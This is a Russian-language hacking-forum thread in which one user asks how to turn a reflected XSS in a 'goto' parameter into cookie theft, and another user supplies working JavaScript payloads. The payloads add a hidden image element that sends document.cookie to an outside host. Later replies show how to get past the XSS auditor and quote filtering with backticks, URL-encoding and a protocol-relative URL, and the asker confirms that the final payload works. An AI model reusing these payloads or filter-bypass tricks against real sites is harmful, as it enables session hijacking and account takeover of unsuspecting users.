PDA

Просмотр полной версии : Как заюзать reflective XSS?

Dominant
07.08.2017, 23:54
Есть reflected XSS и вот такой код отрабатывает:

javascript:alert(1)

Но вот такой:

">alert(1)

проходит но уже блочится xss auditor-oом.

Можно как-то слить куки не добавляя внутрь страницы ?
crlf
08.08.2017, 01:22
Можно так:


Code:
javascript:i=document.createElement('img');i.style .display='none';i.src='http://localhost/?'+escape(document.cookie);console.log(document.bo dy.appendChild(i));

Если есть переносы строк или символы ломающие синтаксис, то нужно использовать urlencode.
Dominant
08.08.2017, 16:10
Забыл упомянуть важную деталь. Инъекция в коде страницы отображается как атрибут src:

src="javascript:alert(1)"

Когда добавляю этот код:

javascript:i=document.createElement('img');i.style .display='none';i.src='http://localhost/?'+escape(document.cookie);console.log(document.bo dy.appendChild(i));

то не отображается и не отрабатывает никак
crlf
08.08.2017, 16:49
Dominant said:
↑ (https://antichat.live/posts/4114830/)
Инъекция в коде страницы отображается как атрибут src


Выложи сюда, посмотрим.
Dominant
08.08.2017, 17:02
Code:
site.com/index.php?goto=javascript:alert(1);

Вот такой запрос даёт:


Code:


Такой


Code:
site.com/index.php?goto=">alert(a);

Даёт:


Code:
alert(a);" name="main" scrolling="auto" NORESIZE frameborder="0" marginwidth="20" marginheight="20" border="no">

но блочится xss аудитором

Такой:


Code:
site.com/index.php?goto=javascript:i=document.createElement ('img');i.style.display='none';i.src='http://localhost/?'+escape(document.cookie);console.log(document.bo dy.appendChild(i));

не выдает ничего
crlf
08.08.2017, 17:23
У меня нормально отрабатывает:

http://s018.radikal.ru/i512/1708/13/002a4d5c8506.png


PHP:

Dominant
08.08.2017, 17:36
crlf said:
↑ (https://antichat.live/posts/4114865/)
У меня нормально отрабатывает:
http://s018.radikal.ru/i512/1708/13/002a4d5c8506.png

PHP:







Но при вводе такого кода в адресную строку - фрейм вообще не добавляется.

Проверил - сбой происходит на "http://". Если убрать их из скрипта то всё добавляется в src но кавычки фильтруются:


PHP:


Без указания протокола нормально
crlf
08.08.2017, 18:29
Кавычку можно бэктиком (`) заменить. Плюс нужно заменить на %2B.


Code:
site.com/index.php?goto=javascript:i=document.createElement (`img`);i.style.display=`none`;i.src=`//localhost/aaaaaaa?`%2Bescape(document.cookie);console.log(do cument.body.appendChild(i));
Dominant
08.08.2017, 21:44
crlf said:
↑ (https://antichat.live/posts/4114898/)
Кавычку можно бэктиком (`) заменить. Плюс нужно заменить на %2B.

Code:
site.com/index.php?goto=javascript:i=document.createElement (`img`);i.style.display=`none`;i.src=`//localhost/aaaaaaa?`%2Bescape(document.cookie);console.log(do cument.body.appendChild(i));



Вот так заработало. Спасибо